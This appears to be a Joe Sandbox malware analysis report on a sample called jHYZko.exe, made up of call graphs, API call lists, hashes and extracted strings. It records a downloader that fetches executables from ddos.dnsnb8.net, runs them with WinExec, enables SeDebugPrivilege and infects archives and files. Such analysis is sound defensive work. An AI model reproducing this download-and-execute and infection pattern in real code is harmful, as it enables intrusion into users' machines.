                                  control_flow_graph 172 e61099-e610b4 173 e610ba-e610c7 172->173 174 e61199-e6119c 172->174 175 e610c8-e610d4 173->175 176 e61184-e61190 175->176 177 e610da 175->177 176->175 178 e61196-e61198 176->178 179 e61113-e61162 call e6185b wsprintfA * 2 URLDownloadToFileA 177->179 178->174 182 e610dc-e6110d call e61000 WinExec lstrlen 179->182 183 e61168-e61182 lstrlen Sleep 179->183 182->178 182->179 183->176 183->179
                                  APIs
                                    • Part of subcall function 00E6185B: GetSystemTimeAsFileTime.KERNEL32(00E61F92,00000000,?,00000000,?,?,?,00E61F92,?,00000000,00000002), ref: 00E61867
                                    • Part of subcall function 00E6185B: srand.MSVCRT ref: 00E61878
                                    • Part of subcall function 00E6185B: rand.MSVCRT ref: 00E61880
                                    • Part of subcall function 00E6185B: srand.MSVCRT ref: 00E61890
                                    • Part of subcall function 00E6185B: rand.MSVCRT ref: 00E61894
                                  • WinExec.KERNEL32(?,00000005), ref: 00E610F1
                                  • lstrlen.KERNEL32(00E64748), ref: 00E610FA
                                  • wsprintfA.USER32 ref: 00E6112A
                                  • wsprintfA.USER32 ref: 00E61143
                                  • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00E6115B
                                  • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00E61169
                                  • Sleep.KERNEL32 ref: 00E61179
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                  • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HG$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                  • API String ID: 1280626985-3330010840
                                  • Opcode ID: 6a24a233ba5479727e3ca2bae50979118bf3fb49d0e4f4e46f31b970b099138b
                                  • Instruction ID: 24fd39b752246f5a966ab2079214f41f62d63cf734c85c62e6e39f87d451bf35
                                  • Opcode Fuzzy Hash: 6a24a233ba5479727e3ca2bae50979118bf3fb49d0e4f4e46f31b970b099138b
                                  • Instruction Fuzzy Hash: CE2191B5981248BEDB21DBA1FC49BAFBBBCAB02395F155095E100B2051D7B45F888F60

                                  Control-flow Graph

                                  APIs
                                  • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 00E6164F
                                  • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00E6165B
                                  • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\jHYZko.exe,00000104), ref: 00E6166E
                                  • CreateThread.KERNEL32(00000000,00000000,00E61099,00000000,00000000,00000000), ref: 00E616AC
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00E616BD
                                    • Part of subcall function 00E6139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\jHYZko.exe), ref: 00E613BC
                                    • Part of subcall function 00E6139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00E613DA
                                    • Part of subcall function 00E6139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00E61448
                                  • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\jHYZko.exe), ref: 00E616E5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\jHYZko.exe$C:\Windows\system32$Documents and Settings
                                  • API String ID: 123563730-3023818835
                                  • Opcode ID: 0f8ecdfd781f9afb2dab656bf0aad2b412ad2e5925d5a6c6339022434cc576bb
                                  • Instruction ID: fbde47895ee413c6cefbdbee513cace2dea17e127d231566230d1b4ed7b0316d
                                  • Opcode Fuzzy Hash: 0f8ecdfd781f9afb2dab656bf0aad2b412ad2e5925d5a6c6339022434cc576bb
                                  • Instruction Fuzzy Hash: C511B4B19802147FDB6257B2FD4EE9B3E6DEB423E1F082051F209B10E0D6B0454CC7A1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 205 e61000-e61023 CreateFileA 206 e61025-e61055 GetFileSize CreateFileMappingA MapViewOfFile 205->206 207 e61092-e61096 205->207 208 e61057-e6105f 206->208 209 e6107b-e61085 206->209 210 e61074-e61075 UnmapViewOfFile 208->210 211 e61061-e6106e call e617d0 208->211 212 e61087-e6108b CloseHandle 209->212 213 e6108d-e61091 CloseHandle 209->213 210->209 211->210 212->213 213->207
                                  APIs
                                  • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HG,http://%s:%d/%s/%s,00E610E8,?), ref: 00E61018
                                  • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75A78400), ref: 00E61029
                                  • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00E61038
                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 00E6104B
                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 00E61075
                                  • CloseHandle.KERNEL32(?), ref: 00E6108B
                                  • CloseHandle.KERNEL32(00000000), ref: 00E6108E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                  • String ID: HG$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                  • API String ID: 1223616889-862939041
                                  • Opcode ID: d27d4c9d1c4a57b97b1573542abf9cdd591251c47a96f05678ea9f4ebcaeb571
                                  • Instruction ID: 8f8c155f49fa9c151c76106ca9ae5787f14acba944d75d642a0525c6c7a4ebb8
                                  • Opcode Fuzzy Hash: d27d4c9d1c4a57b97b1573542abf9cdd591251c47a96f05678ea9f4ebcaeb571
                                  • Instruction Fuzzy Hash: 9D01847154035DBFE7715F71AC88E2BBBACDB447EDF044629F245B2091D6B05E488B60

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 375 e62c48-e62c75 memset call e61973 378 e62c77-e62c7f 375->378 379 e62cb2-e62cb9 375->379 380 e62c81-e62c8b 378->380 381 e62c8f-e62cac CreateThread WaitForMultipleObjects 378->381 382 e62cbb-e62cc2 VirtualFree 379->382 383 e62cc8-e62ccc 379->383 380->381 381->379 382->383
                                  APIs
                                  • memset.MSVCRT ref: 00E62C57
                                    • Part of subcall function 00E61973: PathFileExistsA.SHLWAPI(\N,00000000,C:\Users\user\AppData\Local\Temp\jHYZko.exe), ref: 00E61992
                                    • Part of subcall function 00E61973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00E619BA
                                    • Part of subcall function 00E61973: Sleep.KERNEL32(00000064), ref: 00E619C6
                                    • Part of subcall function 00E61973: wsprintfA.USER32 ref: 00E619EC
                                    • Part of subcall function 00E61973: CopyFileA.KERNEL32(?,?,00000000), ref: 00E61A00
                                    • Part of subcall function 00E61973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E61A1E
                                    • Part of subcall function 00E61973: GetFileSize.KERNEL32(?,00000000), ref: 00E61A2C
                                    • Part of subcall function 00E61973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00E61A46
                                    • Part of subcall function 00E61973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E61A65
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 00E62C99
                                  • WaitForMultipleObjects.KERNEL32(00000001,00E616BA,00000001,000000FF,?,00E616BA,00000000), ref: 00E62CAC
                                  • VirtualFree.KERNEL32(00FF0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\jHYZko.exe,00E64E5C,00E64E60,?,00E616BA,00000000), ref: 00E62CC2
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\jHYZko.exe, xrefs: 00E62C69
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                  • String ID: C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                  • API String ID: 2042498389-2937809834
                                  • Opcode ID: 89b9da001965ab41ac5db4110670a3aa2b6278a8da713ecc507bd139a5c9f610
                                  • Instruction ID: a9a1a74c005a2426c271847c1e18aea556e33e9484ccfacbdd2a2e0d1cfa437d
                                  • Opcode Fuzzy Hash: 89b9da001965ab41ac5db4110670a3aa2b6278a8da713ecc507bd139a5c9f610
                                  • Instruction Fuzzy Hash: C70171B17812207ED61497A5BC1AE9B7E9CEF41BE0F105114F605BA1C1D5A19908C7A0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 384 e614e1-e614fb 385 e61541-e61547 384->385 386 e614fd-e61510 GetModuleHandleA 384->386 389 e61573-e61574 call e61638 385->389 390 e61549-e6154c 385->390 387 e61512-e61518 386->387 388 e6151a-e61535 VirtualQuery 386->388 387->385 392 e61537-e61539 388->392 393 e6153b 388->393 396 e61579-e6157a ExitProcess 389->396 394 e6154e-e61555 390->394 395 e61569-e61570 390->395 392->385 392->393 393->385 394->395 397 e61557-e61566 call e61af9 394->397 397->395
                                  APIs
                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00E61504
                                  • VirtualQuery.KERNEL32(00E614E1,?,0000001C), ref: 00E61525
                                  • ExitProcess.KERNEL32 ref: 00E6157A
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: ExitHandleModuleProcessQueryVirtual
                                  • String ID:
                                  • API String ID: 3946701194-0
                                  • Opcode ID: 41cacdb609dbd183182792e07c61429b236ace731ba26c04e448b3733ed826ac
                                  • Instruction ID: a2b2230c6e8454ad2b1f654d3c6b1ef82d915939e44c9dbd3fc923bed554690f
                                  • Opcode Fuzzy Hash: 41cacdb609dbd183182792e07c61429b236ace731ba26c04e448b3733ed826ac
                                  • Instruction Fuzzy Hash: F11182B1D81204DFCB12DFA6B88567EB7BCEBC47E4B14606AF403F2190D2B08949DB90

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 400 e61915-e61922 401 e61924-e61926 400->401 402 e61928-e6192c 400->402 403 e6196e-e61970 401->403 404 e6192e-e6194d memset GetFileTime 402->404 405 e6194f-e61952 402->405 406 e61966-e61968 404->406 405->403 407 e61954-e61960 SetFileTime 405->407 408 e6196c 406->408 409 e6196a 406->409 407->406 408->403 409->408
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: FileTimememset
                                  • String ID:
                                  • API String ID: 176422537-0
                                  • Opcode ID: 55f3201c90c93c6cbf138c04dc3740c735ec00c37acfba28fe691fab15de83cf
                                  • Instruction ID: 9a4719ac0a5ba6b3c41a31bdb0d717fe9287995a1720e37be7f69ca461b47239
                                  • Opcode Fuzzy Hash: 55f3201c90c93c6cbf138c04dc3740c735ec00c37acfba28fe691fab15de83cf
                                  • Instruction Fuzzy Hash: 24F04432240609ABDB219E26EC04AE777ACAB903E5F04957AF516E1090E770D649DBA0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 410 e66159-e6615d 411 e6615f-e66189 VirtualFree 410->411 412 e6618c-e66192 411->412 413 e660c7-e660cf 412->413 414 e66198-e661b0 VirtualFree 412->414 413->412 417 e660d5-e660eb VirtualAlloc 413->417 415 e661b2-e661b4 414->415 416 e661ba-e661c8 414->416 415->416 418 e66243-e66251 416->418 419 e661ca-e661d7 416->419 421 e660ee-e660f8 417->421 422 e66264-e6626f 418->422 423 e66253 418->423 424 e661dd-e661e0 419->424 434 e660fe-e66106 421->434 435 e660fa-e660fc call e666c8 421->435 427 e66271-e66276 422->427 426 e66255-e66258 423->426 424->418 428 e661e2-e661f2 424->428 426->422 430 e6625a-e66262 426->430 431 e6627c-e66289 427->431 432 e66389-e663b1 VirtualProtect 427->432 433 e661f5-e661fe 428->433 430->426 453 e66292-e66298 431->453 454 e6628b 431->454 438 e663b7-e663ba 432->438 436 e66200-e66203 433->436 437 e6620c-e66219 433->437 442 e66155 434->442 443 e66108-e6611d 434->443 435->434 445 e66205-e66208 436->445 446 e6621b-e66228 436->446 447 e66238-e6623f 437->447 439 e663fc-e66416 VirtualProtect 438->439 440 e663bc-e663c2 438->440 451 e66420-e66425 439->451 452 e66418-e6641d 439->452 440->440 448 e663c4 440->448 442->411 450 e6611f-e66121 443->450 455 e6622a-e66236 445->455 456 e6620a 445->456 446->447 447->433 449 e66241 447->449 448->439 457 e663c6-e663cf 448->457 449->424 458 e66123 450->458 459 e66151-e66154 450->459 460 e662a2-e662ac 453->460 454->453 455->447 456->447 463 e663d4-e663d8 457->463 464 e663d1 457->464 458->459 465 e66125-e66128 458->465 459->442 461 e662b1-e662c8 460->461 462 e662ae 460->462 466 e66373-e66384 461->466 467 e662ce-e662d4 461->467 462->461 468 e663dd-e663e1 463->468 469 e663da 463->469 464->463 470 e66134-e6613b 465->470 471 e6612a-e6612e 465->471 466->427 472 e662d6-e662d9 467->472 473 e662da-e662f1 467->473 474 e663e7-e663fa VirtualProtect 468->474 475 e663e3 468->475 469->468 478 e66130-e66132 470->478 479 e6613d-e6614f 470->479 471->470 471->478 472->473 481 e66365-e6636e 473->481 482 e662f3-e662f9 473->482 474->438 474->439 475->474 478->450 479->450 481->460 483 e66314-e66326 482->483 484 e662fb-e6630f 482->484 486 e6634c-e66360 483->486 487 e66328-e6634a 483->487 485 e66426-e664a9 484->485 496 e664ab-e664c0 485->496 497 e66519-e6651c 485->497 486->485 487->481 503 e66535-e66537 496->503 504 e664c2 496->504 498 e66583-e66587 497->498 499 e6651d-e6651e 497->499 501 e66588-e6658b 498->501 502 e66522-e66533 499->502 505 e665a1-e665a3 501->505 506 e6658d-e6658f 501->506 502->503 507 e6659a 503->507 508 e66539 503->508 509 e664c5-e664cd 504->509 510 e664f8 504->510 516 e66591-e66593 506->516 511 e6659b-e6659d 507->511 517 e665b4 508->517 518 e6653b-e66541 508->518 512 e66542-e66545 509->512 513 e664cf-e664d4 509->513 514 e6656c-e6656f 510->514 515 e664fa-e664fe 510->515 511->516 519 e6659f 511->519 520 e6654d-e66550 512->520 521 e664d6-e664d9 513->521 522 e66517-e66518 513->522 524 e66572 514->524 515->524 525 e66500 515->525 516->511 526 e66595 516->526 523 e665be-e665db 517->523 518->512 519->501 520->523 527 e66552-e66556 520->527 521->520 528 e664db-e664f5 521->528 522->497 529 e665dd-e665f6 523->529 530 e66573-e66576 524->530 525->502 531 e66502 525->531 526->507 532 e66578-e6657a 527->532 533 e66558-e66569 527->533 528->510 534 e665f7-e66608 529->534 530->532 531->530 535 e66504-e66513 531->535 532->529 536 e6657c 532->536 533->514 535->503 537 e66515 535->537 536->534 538 e6657e-e6657f 536->538 537->522 538->498
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00E660DF
                                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00E66189
                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00E661A5
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: Virtual$Free$Alloc
                                  • String ID:
                                  • API String ID: 1852963964-0
                                  • Opcode ID: 242632b66b9a45353187d44472f958243d19d4e79e551592d5c88abe3b32b6c4
                                  • Instruction ID: 53587531016f127375cc21ab932ac2c0df9b7e56e021134efa673eb1fa1db7dc
                                  • Opcode Fuzzy Hash: 242632b66b9a45353187d44472f958243d19d4e79e551592d5c88abe3b32b6c4
                                  • Instruction Fuzzy Hash: A8119A32A50648CFCF318F58DC913ED37A2FF45344F690428DE8EAB2A1DA712A40CB94
                                  APIs
                                  • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\jHYZko.exe,?,?,?,?,?,?,00E613EF), ref: 00E611AB
                                  • OpenProcessToken.ADVAPI32(00000000,00000028,00E613EF,?,?,?,?,?,?,00E613EF), ref: 00E611BB
                                  • AdjustTokenPrivileges.ADVAPI32(00E613EF,00000000,?,00000010,00000000,00000000), ref: 00E611EB
                                  • CloseHandle.KERNEL32(00E613EF), ref: 00E611FA
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00E613EF), ref: 00E61203
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\jHYZko.exe, xrefs: 00E611A5
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                  • String ID: C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                  • API String ID: 75692138-2937809834
                                  • Opcode ID: 1c58748bc84963a3809930564b6155cb47d1d06d3812d896fd2d7a41c66d4d56
                                  • Instruction ID: 855e0d4973776976f1ed36420075a5d6edb5340f51b302a12668d05f5edb9c57
                                  • Opcode Fuzzy Hash: 1c58748bc84963a3809930564b6155cb47d1d06d3812d896fd2d7a41c66d4d56
                                  • Instruction Fuzzy Hash: 17012871900208FFDB00DFE5ED89AAEBBB9FB04345F104169E605A2151D7B05F489B50
                                  APIs
                                  • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\jHYZko.exe), ref: 00E613BC
                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00E613DA
                                  • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00E61448
                                    • Part of subcall function 00E6119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\jHYZko.exe,?,?,?,?,?,?,00E613EF), ref: 00E611AB
                                    • Part of subcall function 00E6119F: OpenProcessToken.ADVAPI32(00000000,00000028,00E613EF,?,?,?,?,?,?,00E613EF), ref: 00E611BB
                                    • Part of subcall function 00E6119F: AdjustTokenPrivileges.ADVAPI32(00E613EF,00000000,?,00000010,00000000,00000000), ref: 00E611EB
                                    • Part of subcall function 00E6119F: CloseHandle.KERNEL32(00E613EF), ref: 00E611FA
                                    • Part of subcall function 00E6119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00E613EF), ref: 00E61203
                                  Strings
                                  • SeDebugPrivilege, xrefs: 00E613D3
                                  • C:\Users\user\AppData\Local\Temp\jHYZko.exe, xrefs: 00E613A8
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                  • String ID: C:\Users\user\AppData\Local\Temp\jHYZko.exe$SeDebugPrivilege
                                  • API String ID: 4123949106-2480338808
                                  • Opcode ID: 0946fdfedb6729bdbacf036c994953741d9392db076ed8ed01265ffd6bda22ab
                                  • Instruction ID: ec70a7b0fc62565bf6ccdf903696aa361754c25be6d7de555a9ad165e2442311
                                  • Opcode Fuzzy Hash: 0946fdfedb6729bdbacf036c994953741d9392db076ed8ed01265ffd6bda22ab
                                  • Instruction Fuzzy Hash: BC31AF71D80209EADF21DBA2AC46FEEBBB8EF44384F2450A9E515B3150DB309E45CB60
                                  APIs
                                  • strstr.MSVCRT ref: 00E623CC
                                  • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E62464
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00E62472
                                  • CloseHandle.KERNEL32(?,00000000,00000000), ref: 00E624A8
                                  • memset.MSVCRT ref: 00E624B9
                                  • strrchr.MSVCRT ref: 00E624C9
                                  • wsprintfA.USER32 ref: 00E624DE
                                  • strrchr.MSVCRT ref: 00E624ED
                                  • memset.MSVCRT ref: 00E624F2
                                  • memset.MSVCRT ref: 00E62505
                                  • wsprintfA.USER32 ref: 00E62524
                                  • Sleep.KERNEL32(000007D0), ref: 00E62535
                                  • Sleep.KERNEL32(000007D0), ref: 00E6255D
                                  • memset.MSVCRT ref: 00E6256E
                                  • wsprintfA.USER32 ref: 00E62585
                                  • memset.MSVCRT ref: 00E625A6
                                  • wsprintfA.USER32 ref: 00E625CA
                                  • Sleep.KERNEL32(000007D0), ref: 00E625D0
                                  • Sleep.KERNEL32(000007D0,?,?), ref: 00E625E5
                                  • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E625FC
                                  • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00E62611
                                  • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00E62642
                                  • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00E6265B
                                  • SetEndOfFile.KERNEL32 ref: 00E6266D
                                  • CloseHandle.KERNEL32(00000000), ref: 00E62676
                                  • RemoveDirectoryA.KERNEL32(?), ref: 00E62681
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                  • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 2203340711-2750826870
                                  • Opcode ID: a583ca7073fdc1bc66548a0c047f48d2ad13ef25bedfff552a363b2e4a5a690a
                                  • Instruction ID: 26d4c5a44feb9de3fbc734e0268341fc77215283f2d1d849743bcb6ebacb2b81
                                  • Opcode Fuzzy Hash: a583ca7073fdc1bc66548a0c047f48d2ad13ef25bedfff552a363b2e4a5a690a
                                  • Instruction Fuzzy Hash: 6981A0B1544304AFD7109F61FC49EAFBBECEB84794F00191EF685F21A0D7B09A498B66
                                  APIs
                                  • memset.MSVCRT ref: 00E62766
                                  • memset.MSVCRT ref: 00E62774
                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00E62787
                                  • wsprintfA.USER32 ref: 00E627AB
                                    • Part of subcall function 00E6185B: GetSystemTimeAsFileTime.KERNEL32(00E61F92,00000000,?,00000000,?,?,?,00E61F92,?,00000000,00000002), ref: 00E61867
                                    • Part of subcall function 00E6185B: srand.MSVCRT ref: 00E61878
                                    • Part of subcall function 00E6185B: rand.MSVCRT ref: 00E61880
                                    • Part of subcall function 00E6185B: srand.MSVCRT ref: 00E61890
                                    • Part of subcall function 00E6185B: rand.MSVCRT ref: 00E61894
                                  • wsprintfA.USER32 ref: 00E627C6
                                  • CopyFileA.KERNEL32(?,00E64C80,00000000), ref: 00E627D4
                                  • wsprintfA.USER32 ref: 00E627F4
                                    • Part of subcall function 00E61973: PathFileExistsA.SHLWAPI(\N,00000000,C:\Users\user\AppData\Local\Temp\jHYZko.exe), ref: 00E61992
                                    • Part of subcall function 00E61973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00E619BA
                                    • Part of subcall function 00E61973: Sleep.KERNEL32(00000064), ref: 00E619C6
                                    • Part of subcall function 00E61973: wsprintfA.USER32 ref: 00E619EC
